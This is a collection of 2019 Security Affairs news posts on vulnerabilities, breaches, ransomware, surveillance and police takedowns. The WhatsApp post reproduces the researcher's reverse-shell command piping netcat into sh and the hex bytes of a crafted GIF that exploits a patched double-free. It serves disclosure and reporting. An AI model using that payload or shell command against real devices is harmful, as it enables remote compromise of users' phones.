The flaw affects versions of Android kernel released before April last year. This vulnerability was addressed in Dec 2017 in the 4.14 LTS kernel [1], AOSP android 3.18 kernel [2], AOSP android 4.4 kernel [3], and AOSP android 4.9 kernel [4]. The expert pointed out that Pixel 2 with most recent security bulletin is still vulnerable based on source code review.

This means that most of the Android devices available on the market with the unpatched kernel are still vulnerable to this vulnerability, even is the owners have installed the latest Android security updates.

Some of the devices which appear to be vulnerable based on source code review are:

1) Pixel 2 with Android 9 and Android 10 preview (https://android.googlesource.com/kernel/msm/+/refs/heads/android-msm-wahoo-4.4-q-preview-6/)
2) Huawei P20
3) Xiaomi Redmi 5A
4) Xiaomi Redmi Note 5
5) Xiaomi A1
6) A3
7) Moto Z3
8) Oreo LG phones (run according to )
9) Samsung S7, S8, S9

Maddie Stone explained that the flaw is accessible from inside the Chrome sandbox, the issue is exploitable in Chrome’s renderer processes under Android’s ‘isolated_app’ SELinux domain. This means that a remote attacker could potentially exploit the flaw by chaining it with a Chrome rendering issue.

“The bug is a local privilege escalation vulnerability that allows for a full compromise of a vulnerable device. If the exploit is delivered via the web, it only needs to be paired with a renderer exploit, as this vulnerability is accessible through the sandbox.” Stone said.

“I’ve attached a local exploit proof-of-concept to demonstrate how this bug can be used to gain arbitrary kernel read/write when run locally. It only requires untrusted app code execution to exploit CVE-2019-2215.”

Google is expected to release a security patch for its October’s Android Security Bulletin.

“This issue is rated as High severity on Android and by itself requires installation of a malicious application for potential exploitation. Any other vectors, such as via web browser, require chaining with an additional exploit,” concludes the Chromium blog. “We have notified Android partners, and the patch is available on the Android Common Kernel. Pixel 3 and 3a devices are not vulnerable while Pixel 1 and 2 devices will be receiving updates for this issue as part of the October update.”

Pierluigi Paganini

(SecurityAffairs – Google, zero-day)

The post Project Zero researcher found unpatched Android zero-day likely exploited by NSO group appeared first on Security Affairs.

Egypt regularly spies on opponents and activists with mobile apps

Researchers at Check Point discovered that Egypt ‘ government has been spying citizens in a sophisticated surveillance program

Researchers at Check Point discovered that the Egyptian government has been spying on activists and opponents as part of a sophisticated surveillance program.

The list of victims is long and includes journalists, politicians, activists and lawyers.

The expert started their investigation after Amnesty International published a report in March that provided details on targeted attacks against journalists and human rights activists in Egypt.

The Egyptian government conducted most of the spying activities using mobile apps, some of which are also delivered via Google Play.

Check Point has identified tens of victims that were tricked into download the malicious apps that offered useful services.

Some of the apps used by the attackers were Secure Mail, a Gmail add-on to improve the security, iLoud200%, a smart storage solution that would free up storage space on the victim’s device, and the IndexY callerID service.

Using these apps the government cyber spies were able to gather login credentials to email accounts, bypass privacy settings, and store call logs.

These apps were available through the official Play Store and bypassed the security checks implemented by Google.

Experts provided details of the command and control infrastructure over the time. Attackers used a range of domain names that included words like “secure” and “verify” in their names to avoid raising suspicion of the victims.

“The full list of indicators belonging to this campaign and shared by Amnesty on GitHub showed multiple websites that used keywords such as “mail”, “secure”, or “verify”, possibly not to arouse any suspicions and to masquerade as legitimate mailing services.” reads the report published by Check Point.

“By visualizing the information available about each of these websites, we saw clear connections between them: they were registered using NameCheap, had HTTPS certificates, and many of them resolved to the same IP addresses.”

One of the domains analyzed by the researchers, maillogin[.]live, left a directory unsecured online, allowing the expert to analyze its content, a collection of files uploaded between May and June.

Egypt

“By downloading the contents of this directory, we got our hands on many PHP scripts, API clients, SQL files and configuration files from the server. Looking into them revealed several aspects about the inner workings of this operation, the functionalities that were implemented on this server and possibly others, and lastly some information about the perpetrators behind it all.” continues the analysis.

“For example, we realized that the attackers can control the operation by sending commands to one of the PHP scripts. The script allowed the attackers to query the data stored on the server, but it had self-destructing capabilities as well, such as removing an existing campaign or deleting all of the information collected from victims”

The researchers also discovered a Telegram channel that advertised itself as supporting the opponents of the regime in Egypt, but that is likely under the control of the intelligence services.

Check Point was not able to attribute the operation to the Egyptian intelligence, but the nature of the victims, the level of sophistication of the attacks and other evidence such as a server registered to the Ministry of Communications and Information Technology in Egypt.

“We discovered a list of victims that included handpicked political and social activists, high-profile journalists and members of non-profit organizations in Egypt.” concludes Check Point.

“The information we gathered from our investigation suggested that the perpetrators are Arabic speakers, and well familiar with the Egyptian ecosystem. Because the attack might be government-backed, it means that we are looking at what might be a surveillance operation of a country against its own citizens or of another government that screens some other attack using this noisy one.”

Pierluigi Paganini

(SecurityAffairs – Egypt, surveillance)

The post Egypt regularly spies on opponents and activists with mobile apps appeared first on Security Affairs.

Ukrainian police dismantled a bot farm involved in multiple spam campaigns

The Ukrainian police dismantled a bot farm involved in spam campaigns carried out through various services, including email and social networks.

Cybercrime is a prolific business, criminal organizations continues to make profits with illegal activities in the cyberspace, but police are ready to contrast them. Cyber experts at the Ukrainian police dismantled a bot farm involved in spam campaigns carried out through various services, including email and social networks.

“Cyber ​​police officers, together with investigators of the Main Investigative Directorate of the National Police of Ukraine, under the procedural guidance of the Prosecutor General’s Office of Ukraine, exposed a large-scale service for mass distribution of electronic messages.” states the press release published by the Ukrainian police. “It is established that all works of the service are carried out exclusively at the request of interested clients. With this resource, it was possible to buy activated accounts in large numbers to various mail resources, social networks, payment systems and more. At the same time, verified accounts were also sold, the cost of which was much higher.”

Operators behind the bot farm were offering large numbers of active accounts for multiple online services that their customers used to carry out spam campaigns.

The Ukrainian Police raided houses, apartments, garages and rented offices in six Ukrainian cities (Kiev, Odesa, Lviv, Nikolaev, Rivne, and Kherson) and seized equipment used in the bot farm, including multi-SIM card modems and electronic equipment used to signup to payment systems.

Crooks were using the SIM cars to register accounts on various services that require a phone number for the verification of users’ identity. Crooks were preserving their anonymity using VPN and TOR services.

Police officers and the Main Investigative Directorate of Ukraine’s National Police carried out searches at houses, apartments, garages and rented offices where the group set up the illegal activity.

To anonymize the bot farm traffic, the operators ran connections through VPN services and the Tor network. Details of how the officers were able to discover the physical addresses remain undisclosed.

Authorities will analyze the seized equipment in an attempt to collect additional information on the crime rings.

“The pre-trial investigation is ongoing within the framework of the previously initiated criminal proceedings under Art. 1889 (Requirement), Art. 258 (Terrorist Act), Art. Measures are being taken to prosecute those involved in the organization of such activities. ” concludes the statement.

Today I had the pleasure to write a post on another successful operation conducted by law enforcement. A joint operation conducted by the Netherlands’ National Criminal Investigation Department and National Cyber Security Center allowed to track down and seize five servers that were composing a cybercrime underground bulletproof hosting service.

The servers were hosted at an unnamed data center in Amsterdam, it was used by tens of IoT botnets involved in DDoS attacks worldwide. 

Pierluigi Paganini

(SecurityAffairs – bot farm, cybercrime)

The post Ukrainian police dismantled a bot farm involved in multiple spam campaigns appeared first on Security Affairs.

Dutch police shut down bulletproof service hosting tens of DDoS botnets

Dutch police seized a bulletproof hosting service in a major takedown, the infrastructure was used by tens of IoT botnets involved in DDoS attacks.

A joint operation conducted by the Netherlands’ National Criminal Investigation Department and National Cyber Security Center allowed to track down and seize five servers that were composing a cybercrime underground bulletproof hosting service.

The servers were hosted at an unnamed data center in Amsterdam, it was used by tens of IoT botnets involved in DDoS attacks worldwide. The bulletproof hosting service was used to host malware and command and control systems of several DDoS botnets.

“Middelburg, Veendam, Amsterdam, Driebergen – The police has taken five servers offline that were used to control a version of a so-called botnet.” reads the press release published by the Dutch police. “The hardware was seized and the business operations stopped. A 24-year-old man from Veendam and a 28-year-old man from Middelburg were arrested on Tuesday evening. They are suspected of, among other things, computer breach and the spread of malware.”

Authorities revealed that they have received more than three thousand reports of malware spread through the bulletproof hosting service.over a period of one year.

The authorities also arrested two Dutch nationals who had been running a Mirai botnet from the servers of KV Solutions BV (KV hereinafter) bulletproof hosting service.

In this case, the police say, the people controlling those servers were a pair of Dutch nationals who had been running a Mirai botnet with cover from the bulletproof host.

“The investigation also revealed that this botnet was very aggressively trying to infect other devices, up to over a million attempts per month on one device,” the translated police statement reads.

“The investigation also revealed that this botnet was very aggressively trying to infect other devices, up to over a million attempts per month on one device. Which DDoS attacks can be attributed to this botnet is part of the further investigation.” continues the statement.

Authorities are analyzing the seized servers and the data they contain will likely lead to the arrests of other players in the cybercrime underground.

Pierluigi Paganini

(SecurityAffairs – bulletproof hosting service, malware)

The post Dutch police shut down bulletproof service hosting tens of DDoS botnets appeared first on Security Affairs.

US Secretary of State Mike Pompeo warns Italy over 5G Chinese equipment supply

US continues to warn its allies over China’s “predatory approach” especially for 5G technology, this time US Secretary of State alerts Italy.

US Secretary of State Mike Pompeo during the recent meeting with Italian Foreign Minister Luigi Di Maio warned Italy of China’s “predatory approach” to trade and investment.

Once again US is warning its allies over Chinese 5G technology, but the Italian Government explained that its special powers over 5G supply deals would mitigate any risk.

According to Pompeo, China and its technology pose a serious threat to the homeland security of the US and its allies.

“China has a predatory approach in trade and investment” and represents a “mutual threat” to the two countries” explained Pompeo during a joint press conference with Italy’s Foreign Minister Luigi Di Maio.

“When the Chinese Communist party shows up to make an investment to gain political power or threaten a nation’s security, that’s what needs to be protected against,”

Di Maio explained that the Italian Government opted to protect its infrastructure invoking the so-called “golden powers” in supply deals for fifth-generation (5G) telecom services. According to Di Maio, the golden powers over the supply deals on technology “make [Italy] among the most advanced in Europe on security”.

“We have no intention of taking part in trade accords that might harm our sovereignty as a state,” he added.

In September, Italy has exercised special powers in relation to the purchase of goods and services. The Italian government will impose conditions and technical specifications for the purchase of equipemnt and services for its 5G infrastructure.

In August, Romania announced it will ban Chinese giant Huawei from its 5G network, reads a joint statement signed by the Romanian and US presidents.

In April, British Government approved a limited role for Huawei in the building of a national 5G network in the country, ignoring security concerns from senior ministers. In December, a Czech cyber-security agency warned against using Huawei and ZTE technologies because they pose a threat to state security.

The Chinese giant was already excluded by several countries from building their 5G internet networks. The United StatesAustraliaNew Zealand, and Japan announced the exclusion of Huawei technology for their 5G internet networks.

Pierluigi Paganini

(SecurityAffairs – China, 5G)

The post US Secretary of State Mike Pompeo warns Italy over 5G Chinese equipment supply appeared first on Security Affairs.

Zendesk 2016 security breach may impact Uber, Slack, and over 100k organizations

Zendesk discloses a data breach that took place in 2016 when a hacker accessed data of 10,000 users, including passwords, emails, names, and phone numbers.

In 2016, customer service software company Zendesk suffered a security breach that exposed data of 10,000 users, including passwords, emails, names, and phone numbers. Zendesk software is currently used by more than one hundred of thousand organizations worldwide, including Uber, Shopify, Airbnb, and Slack.

Today the company published a security notice to disclose the incident.

“We recently were alerted by a third party regarding a security matter that may have affected the Zendesk Support and Chat products and customer accounts of those products activated prior to November of 2016.” reads the security notice. “While our investigation is still ongoing, on September 24, 2019, we determined that information belonging to a small percentage of customers was accessed prior to November of 2016.”

The company was informed by a third party regarding the security breach that might have impacted Zendesk Support and Chat accounts activated prior to November 1, 2016.

As of September 24, 2019 the company identified approximately 10,000 Zendesk Support and Chat accounts, including expired trial and accounts that are no longer active.

The customer service software firm decided to alert all the impacted users inviting them to take the following steps

  • If you installed a Zendesk Marketplace or private app prior to November 1, 2016 that saved authentication credentials such as API keys or passwords during installation, we recommend that you rotate all credentials for the respective app.
  • In addition, if you uploaded a TLS certificate to Zendesk prior to November 1, 2016 which is still valid, we recommend you upload a new certificate, and revoke the old one
  • While we have no indication at this time that other authentication credentials were accessed, customers may want to consider rotating authentication credentials used in Zendesk products prior to November 1, 2016. API Tokens in Chat do not need to be rotated.

The customer support ticketing platform discovered that the following customer information might have been accessed by the attacker:

  • Agent and end-user names that were hashed and salted
  • Contact information
  • Usernames and hashed and salted passwords
  • Transport Layer Security (TLS) encryption keys provided to Zendesk by customers
  • Configuration settings of apps installed from the Zendesk app marketplace or private apps   

The company announced that as a precautionary measure it will implement password rotations for all active agents in Support and Chat, and all end users in Support created prior to November 1, 2016. 

“Our security team is committed to determining the full extent of the data exposure and we will update you if we learn of any additional information that pertains to unauthorized access to your account so you can take appropriate proactive measures to protect your business,” concludes Zendesk.

Anyway, customers are invited to change their passwords.

This isn’t the first security breach suffered by Zendesk, the company was already breached in 2013.

Pierluigi Paganini

(SecurityAffairs – hacking, data breach)

The post Zendesk 2016 security breach may impact Uber, Slack, and over 100k organizations appeared first on Security Affairs.

Expert disclosed details of remote code execution flaw in Whatsapp for Android

Researcher discovered a double-free vulnerability in WhatsApp for Android that could be exploited by remote attackers to execute arbitrary code on the vulnerable device.

A security researcher that goes online with the moniker Awakened discovered a double-free vulnerability in WhatsApp for Android and demonstrated how to leverage on it to remotely execute arbitrary code on the target device.

The expert reported the issue to Facebook that acknowledged and addressed the flaw with the release of WhatsApp version 2.19.244.

The expert discovered that the flaw resides in the DDGifSlurp in decoding.c in libpl_droidsonroids_gif .so library used to generate the preview of the GIF file when a user opens Gallery view in the popular messaging application to send a media file,

“When the WhatsApp Gallery is opened, the said GIF file triggers the double-free bug on rasterBits buffer with size sizeof(GifInfo). Interestingly, in WhatsApp Gallery, a GIF file is parsed twice. When the said GIF file is parsed again, another GifInfo object is created.” reads a technical analysis published by the expert. “Because of the double-free behavior in Android, GifInfo info object and info->rasterBits will point to the same address. DDGifSlurp() will then decode the first frame to info->rasterBits buffer, thus overwriting info and its rewindFunction(), which is called right at the end of DDGifSlurp() function.”

The expert was able to craft a GIF file to control the PC register, then he successfully achieved remote code execution by executing the following command:

system("toybox nc 192.168.2.72 4444 | sh");

The expert highlighted that it was not possible to point to system() function in libc.so, instead, it was necessary to first let PC jumps to an intermediate gadget.

we need an information disclosure vulnerability that gives us the base address of libc.so and libhwui.so. That vulnerability is not in the scope of this blogpost.” continues the expert. ” Note that the address of system() and the gadget must be replaced by the actual address found by an information disclosure vulnerability.”

The expert developed the code that was able to generate a corrupted GIF file that could exploit the vulnerability.

notroot@osboxes:~/Desktop/gif$ gcc -o exploit egif_lib.c exploit.c
.....
.....
.....
notroot@osboxes:~/Desktop/gif$ ./exploit
buffer = 0x7ffc586cd8b0 size = 266
47 49 46 38 39 61 18 00 0A 00 F2 00 00 66 CC CC
FF FF FF 00 00 00 33 99 66 99 FF CC 00 00 00 00
00 00 00 00 00 2C 00 00 00 00 08 00 15 00 00 08
9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 84 9C 09 B0
C5 07 00 00 00 74 DE E4 11 F3 06 0F 08 37 63 40
C4 C8 21 C3 45 0C 1B 38 5C C8 70 71 43 06 08 1A
34 68 D0 00 C1 07 C4 1C 34 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 54 12 7C C0 C5 07 00 00 00 EE FF FF 2C 00 00
00 00 1C 0F 00 00 00 00 2C 00 00 00 00 1C 0F 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 2C 00 00 00 00
18 00 0A 00 0F 00 01 00 00 3B

Then he copied the content into a GIF file and send it as Document with WhatsApp to another WhatsApp user. The researcher explained that the crafted GIF file could not be sent as a Media file, because WhatsApp attempts to convert it into an MP4 before to send it. The vulnerability will be triggered when the target user that has received the malicous GIF file will open WhatsApp Gallery to send a media file to his friend.

Below the attack vectors devised by the expert:

  1. Local privilege escaltion (from a user app to WhatsApp): A malicious app is installed on the Android device. The app collects addresses of zygote libraries and generates a malicious GIF file that results in code execution in WhatsApp context. This allows the malware app to steal files in WhatsApp sandbox including message database.
  2. Remote code execution: Pairing with an application that has an remote memory information disclosure vulnerability (e.g. browser), the attacker can collect the addresses of zygote libraries and craft a malicious GIF file to send it to the user via WhatsApp (must be as an attachment, not as an image through Gallery Picker). When the user opens the Gallery view in WhatsApp, the GIF file will trigger a remote shell in WhatsApp context.

The exploit works for WhatsApp version 2.19.230 and prior versions, the company addressed it with the release of the version 2.19.244

The exploit works for Android 8.1 and 9.0, but the expert explained that it does not work for Android 8.0 and below.

“In the older Android versions, double-free could still be triggered. However, because of the calls by the system after the double-free, the app just crashes before reaching to the point that we could control the PC register.” concludes the expert.

Pierluigi Paganini

(SecurityAffairs – WhatsApp, hacking)

The post Expert disclosed details of remote code execution flaw in Whatsapp for Android appeared first on Security Affairs.

Former American Express employee under investigation for customers’ data abuse

Authorities are investigating an American Express employee for unauthorized access to cardholder information and potentially abuse for fraud.

Authorities launched a criminal investigation on an American Express employee that is suspected to accessed to cardholder information and potentially abused for fraud.

Exposed information includes full name, physical and/or billing address, Social Security numbers, birth dates, and the credit card number.

The suspect is no longer working for the financial organization.

On September 30th, 2019, the financial institution began sending out data breach notifications to the impacted, the notice informed them that the former employee potentially used the data for fraudulent activities, including identity theft and financial frauds.

“It was brought to our attention that personal information, related to your American Express Card account listed above, may have been wrongfully accessed by one of our employees in an attempt to conduct fraudulent activity, including potentially opening accounts at other financial institutions.” reads the data breach notification. “In response, we immediately launched an investigation and are fully cooperating with law enforcement agencies to further their investigation.

American Express is offering free credit monitoring services through Experian Identity Works to impacted customers.

The company is also recommending impacted cardholders to monitor their credit report and statements for any fraudulent activity and report any suspicious activity to their bank.

Pierluigi Paganini

(SecurityAffairs – American Express, cybercrime)

The post Former American Express employee under investigation for customers’ data abuse appeared first on Security Affairs.

Ten hospitals in Alabama and Australia have been hit with ransomware attacks

A new wave of ransomware attacks hit US and Australian hospitals and health service providers causing the paralysis of their systems.

Several hospitals and health service providers from the U.S. and Australia were hit by ransomware attacks that forced the administrators to shut part of their IT infrastructure.

“Ten hospitals—three in Alabama and seven in Australia—have been hit with paralyzing ransomware attacks that are affecting their ability to take new patients, it was widely reported on Tuesday.” reported ArsTechnica.

“All three hospitals that make up the DCH Health System in Alabama were closed to new patients on Tuesday as officials there coped with an attack that paralyzed the health network’s computer system.”

According to a joint press release published by the affected hospitals, the DCH Regional Medical Center, Northport Medical Center, and Fayette Medical Center from West Alabama’s Tuscaloosa, Northport, and Fayette, had limited access to their computing systems.

“A criminal is limiting our ability to use our computer systems in exchange for an as-yet unknown payment,” DCH representatives wrote in a release. “Our hospitals have implemented our emergency procedures to ensure safe and efficient operations in the event technology dependent on computers is not available.”

Similar problems impacted at least seven hospitals in Australia. The information technology systems at a number of hospitals and health services in Gippsland and south-west Victoria have been impacted by a cyber security incident.

“A number of servers across the state have been impacted. Investigations are still taking place on the full extent of the impact.” reads the security advisory,

“The cyber incident, which was uncovered on Monday, has blocked access to several systems by the infiltration of ransomware, including financial management. Hospitals have isolated and disconnected a number of systems such as internet to quarantine the infection.”

A couple of weeks ago, the Campbell County Memorial Hospital in Gilette, Wyoming was hit by a ransomware attack on its computer systems that caused service disruptions.

Recently several US cities have suffered ransomware attacks, in August at least 23 Texas local governments were targeted by coordinated attacks.

Some cities in Florida were also victims of hackers, including Key Biscayne, Riviera Beach and Lake City. In June, the Riviera Beach City agreed to pay $600,000 in ransom to decrypt its data after a ransomware-based attack hit its computer system. A few days later, Lake City also agreed to pay nearly $500,000 in ransom after a ransomware attack.

In July 2018, another Palm Beach suburb, Palm Springs, decided to pay a ransom, but it was not able to completely recover all its data.

In March 2019, computers of Jackson County, Georgia, were infected with ransomware that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files. The list of ransomware attacks is long and includes schools in Louisiana and Alabama.

Health organizations weren’t spared either, LabCorp and Hancock Health being only two of the most recently affected.

Pierluigi Paganini

(SecurityAffairs – hospitals, ransomware)


The post Ten hospitals in Alabama and Australia have been hit with ransomware attacks appeared first on Security Affairs.

Experts found 20 Million tax records for Russian citizens exposed online

Experts discovered an unprotected Elasticsearch cluster containing personally identifiable and tax information of Russian citizens exposed online.

Security experts from Comparitech along with security researcher Bob Diachenko discovered 20 million tax records belonging to Russian citizens exposed online in clear text and without protection.

The experts found an unprotected Elasticsearch cluster that was containing personally identifiable information on Russian citizens spanning from 2009 to 2016.

“A database of more than 20 million Russian tax records was found on an unsecured server, accessible to anyone with a web browser.” reads the post published by Comparitech.

Comparitech partnered with security researcher Bob Diachenko to investigate the data exposure, which included sensitive personal and tax information. The database was taken offline after Diachenko notified the owner, who is based in Ukraine.”

Russian citizens

The Elasticsearch database was first indexed by search engines in May 2018, Diachenko discovered it on September 17, 2019, and on September 20, 2019 it was secured.

It is not possible to determine whether anyone else accessed the exposed data before it was discovered by Diachenko. The experts also revealed that the owner based in Ukraine, but did not reveal its identity.

The cluster included multiple databases, two of them contained tax and personally identifiable information about Russian citizens, prevalently from Moscow and the surrounding area.

“The first database contained more than 14 million personal and tax records from 2010 to 2016, and the second included over 6 million from 2009 to 2015.” continues the experts.

Exposed records included the following information:

  • Full name
  • Address
  • Residency status
  • Passport number
  • Phone number
  • Tax ID number
  • Employer name and phone number
  • Tax amount

The exposed data could be used by threat actors to carry out tax scam and frauds.

“Affected individuals could be at risk of identity theft and should monitor their accounts closely. Tax fraud could also be a risk, though our team is not well-versed enough on the topic of the Russian tax system to give concrete advice.” concludes the experts.

“Potential victims should also be on the lookout for targeted phishing and other scams. Fraudsters could pose as tax officials, for example, to steal money or request additional information to aid in identity theft.”

Pierluigi Paganini

(SecurityAffairs – Russian citizens, data leak)

The post Experts found 20 Million tax records for Russian citizens exposed online appeared first on Security Affairs.

Teheran: U.S. has started ‘Cyber War’ against Iran

Iran ’s Passive Defense Organization chief Gholamreza Jalali declared that the US government has started its cyber war against the country.

Gholamreza Jalali, Iran’s Passive Defense Organization chief, announced that that “America has started its cyber war against Iran, without providing more details.

The news was reported by the ISNA news website on October 1, Jalali also added that Iran “decisively will resort to cyber defense.”

Jalali is an Islamic Revolution Guard Corps (IRGC) brigadier general, in November 2018 he announced that government experts have uncovered and neutralized a new strain of Stuxnet.

“Recently we discovered a new generation of Stuxnet which consisted of several parts … and was trying to enter our systems,” Jalali was quoted as saying by the semi-official ISNA news agency at a news conference marking Iran’s civil defense day

In May, Jalali had accused the U.S. of carrying out psyops operations through social media aimed at influencing Iranians’ sentiment on specific topics. The official also revealed that Iran is targeted by 50,000 cyberattacks, the cyber defense of the country suffers eight major attacks annually.

Last week, Iran’s oil minister, Bijan Namdar Zanganeh, ordered companies operating in the energy sector to be on ‘full alert’ to the threat of “physical and cyber” attacks.

“it is necessary for all companies and installations the oil industry to be on full alert against physical and cyber threats,” reads a statement published on the oil ministry’s Shana website.

Iran fears a retaliation of Western countries that are accusing it to carry out physical and cyber attacks against their infrastructure and countries in the Middle East.

Military and intelligence experts believe that western coalition, driven by the US could carry out a series of cyber attacks against Iranian critical infrastructure. A few days after the drone attacks, some western media reported destructive cyber attacks against infrastructures in the Iranian oil sector, but Iran denied it.

Pierluigi Paganini

(SecurityAffairs – Iran, cyberwar)

The post Teheran: U.S. has started ‘Cyber War’ against Iran appeared first on Security Affairs.

Singapore presented the Operational Technology (OT) Cybersecurity Masterplan

The Cyber Security Agency of Singapore (CSA) presented the Operational Technology (OT) Cybersecurity Masterplan to increase the resilience of Critical Information Infrastructure (CII) sectors.

The Cyber Security Agency of Singapore (CSA) presented the Operational Technology (OT) Cybersecurity Masterplan to enhance the security and resilience of Singapore’s Critical Information Infrastructure (CII) sectors in delivering essential services.

Operational Technology (OT) systems are becoming a privileged target for highly-sophisticated threat actors, for this reason, CSA is going to propose measures to increase the resilience of these systems to cyber attacks.

“The Masterplan serves to improve cross-sector response to mitigate cyber threats in the OT environment and to strengthen partnerships with industry and stakeholders.” reads the announcement published by the CSA. “The OT Cybersecurity Masterplan outlines key initiatives covering the areas of People, Processes and Technology to uplift the of our CII owners and that operate OT systems.”

Singapore is one of the most hyper-connected commercial hub, for this reason, it is essential to adopt all the necessary countermeasures to repeal any kind of attack.

Key point in the OT Cybersecurity Masterplan include:

  1. Providing OT cybersecurity training to develop human capabilities
  2. Facilitating the sharing of information through an OT Information Sharing and Analysis Centre (OT-ISAC)
  3. Strengthening OT owners’ policies and processes through the issuance of an OT Cybersecurity Code of Practice (CCoP)
  4. Adopting technologies for cyber resilience through Public-Private Partnerships

The Masterplan encourages OT equipment manufacturers and service providers to implement the best cybersecurity practices by design.

“The OT Cybersecurity Masterplan will serve as a strategic blueprint to guide Singapore’s efforts to foster a resilient and secure cyber environment for our OT CII, while taking a balanced approach between security requirements, rapid digitalisation and ease of conducting business-as-usual activities.” concludes the announcement.

The Singapore OT Cybersecurity Masterplan is available at the following URL:

https://www.csa.gov.sg/~/media/csa/documents/publications/ot_masterplan/otcybersecuritymasterplan.pdf

Pierluigi Paganini

(SecurityAffairs – Cybersecurity Masterplan, Operational Technology)

The post Singapore presented the Operational Technology (OT) Cybersecurity Masterplan appeared first on Security Affairs.

A new Adwind variant involved in attacks on US petroleum industry

Adwind is back, a new variant of the popular RAT is targeting US petroleum industry entities with new advanced features.

A new variant of the popular Adwind RAT (aka jRATAlienSpy, and JSocket) is targeting entities in the US petroleum industry. The new variant implements advanced features such as multi-layer obfuscation. The malware is distributed via a malspam campaign, the spam messages come with malicious attachments or include URL to malicious content.

“A new campaign spreading the Adwind RAT has been seen in the wild, specifically targeting the petroleum industry in the US. The samples are relatively new and implement multi-layer obfuscation to try to evade detection.” reads the analysis published by NetSkope. “We found multiple RAT samples hosted on the serving domain and spread across multiple directories, all hosted within the last month.”

Adwind is a cross-platform Remote Access Trojan written in Java, it was observed in attacks against aerospace enterprises in Switzerland, Austria, Ukraine, and the US. The Adwind RAT was first discovered early 2012, the experts dubbed it Frutas RAT and later it was identified with other names, Unrecom RAT (February 2014), AlienSpy (October 2014), and recently JSocket RAT (June 2015).

Adwind is could infect all the major operating systems, including Windows, Mac, Linux, and Android, it is available in the cybercrime underground as a malware-as-a-service (MaaS) model.

Once the Adwind RAT has infected a computer it can recruit it into a botnet for several illegal purposes (i.e. DDoS attacks, brute-forcing attacks).

Experts pointed out that the functionality of the RAT has remained the same as previous variants, the major change is in the obfuscation technique it implements. The malware uses delivers RAT payloads via nested JAR archives. The Netskope Threat Protection detects the malware as ByteCode-JAVA.Trojan.Kryptik and Gen:Variant.Application.Agentus.1.

“When the victim executes the payload, there are multiple levels of JAR extractions that occur.” continues the analysis

Netskope researchers discovered 20 malware samples hosted using compromised user accounts of the Australian ISP Westnet.

“The Adwind RAT is a well-known malware family that has actively been used in multiple campaigns over the last couple of years. The samples we analyzed showed that the VirusTotal detection ratio for the top-level JAR was 5/56 while that of the final decrypted JAR was 49/58.” conclude the expert. “These detection ratios indicate that attackers have largely been successful in developing new, innovative obfuscation techniques to evade detection.”

Netyskope’s report includes Indicators of compromise (IOCs), malware sample hashes for various JAR payloads used in these attacks, and IP addresses and domains of C&C infrastructure.

Pierluigi Paganini

(SecurityAffairs – Adwind, malware)

The post A new Adwind variant involved in attacks on US petroleum industry appeared first on Security Affairs.

Hackers breached one of Comodo Forums, 245,000 users impacted

The ITarian Forum, the Comodo discussion board and support forums, has been hacked and data belonging to nearly 245,000 registered users were exposed.

Hackers breached the ITarian Forum, the Comodo discussion board and support forums, accessing login credentials of nearly 245,000 users registered with the Comodo Forums websites. Comodo has not specified which of its two forums has been hacked. Exposed data include login username, name, email address, hashed passwords, last IP address used to access the forums, and some social media usernames for a limited number of users.

“Very recently a new vulnerability in the vBulletin software, which is one of the most popular server applications for website comments including the Comodo Forums, was made public.” reads the security notice published by Comodo. “Over the weekend at 4:57 am ET on Sunday September 29, 2019, we became aware that this security flaw in the vBulletin software had become exploited resulting in a potential data breach on the Comodo Forums.

“Our IT infrastructure team immediately took steps to mitigate the exploit by taking the forums offline and applying the recommended patches.”

comodo data breach

Comodo attempted to reassure its forum users saying that its staff immediately took the forums offline to apply the necessary countermeasures.

The attackers exploited the recently disclosed zero-day vulnerability in vBulletin (CVE-2019-16759).

The hack of Comodo forum took place on September 29, a few days after vBulletin developers have released a patch to address it, this means that for some reason administrators at Comodo failed in applying it.

vBulletin is one of the most popular forum software, for this reason, the disclosure of a zero-day flaw affecting it could impact a wide audience. More than 100,000 websites online run on top of vBulletin.

On September 24, an anonymous hacker disclosed technical details and proof-of-concept exploit code for a critical zero-day remote code execution flaw in vBulletin.

Two days later, the security expert Troy Mursch of Bad Packets observed a botnet that it utilizing the recently disclosed vBulletin exploit to secure vulnerable servers to avoid that can be compromised by other threat actors. This technique is not new and allows them to preserve their own botnet.

Currently, Comodo operates two forums, “forums.comodo.com,” and ITarian Forum hosted at “forum.itarian.com,” the former runs on the Simple Machines Forum software, while the latter is based on vBulletin.

For this reason, hackers likely breached the ITarian Forum that is used as a discussion board for its customers searching for technical information and assistance.

“As a precautionary measure we recommend that forum users should immediately change their passwords and exercise good password practices such as strong random passwords and not share your passwords across different Internet accounts.” recommends Comodo. “The account passwords were encrypted in vBulletin for the Comodo Forum users, but a password change is recommended as part of good password practices.”“We deeply regret any inconvenience or distress this vulnerability may have caused you, our users,” the company says.

Pierluigi Paganini

(SecurityAffairs – vBulletin, data breach)

The post Hackers breached one of Comodo Forums, 245,000 users impacted appeared first on Security Affairs.

Danish company Demant expects to incur losses of up to $95 after cyber attack

Demant, a leading international hearing health care company, expects to incur losses of up to $95 million following a ransomware attack.

Last month, Demant suffered a cyber attack that caused important problems to its operations, the company has yet to recover after the attack, a circumstance that suggests it was hit by a ransomware attack.

Demant expects to incur losses of up to $95 million following the incident, which includes a deduction of $14.6 million of expected insurance coverage.

We are therefore talking about figures that come into the list of the most important losses caused by cyber attacks.

“The cyber-crime has had a significant impact on our ability to generate the growth we expected for the second half-year, and even though our commercial operations are doing their utmost to make up for the impact of the incident, we are in a situation where we cannot execute on our ambitious commercial growth activities to the planned extent. We are working around the clock to return to our growth-oriented business focus, while minimising the impact on customers and users of our products. We are grateful for the patience and loyalty shown, and the Demant organisation will continue to approach the incident with extreme dedication until we are completely recovered and have re-established what was severely disrupted by the incident,” says Søren Nielsen, President & CEO of Demant.

On September 3, Demant was forced to shut down its entire internal IT infrastructure following an act of “cyber-crime,” but the firm did not confirm a ransom incident.

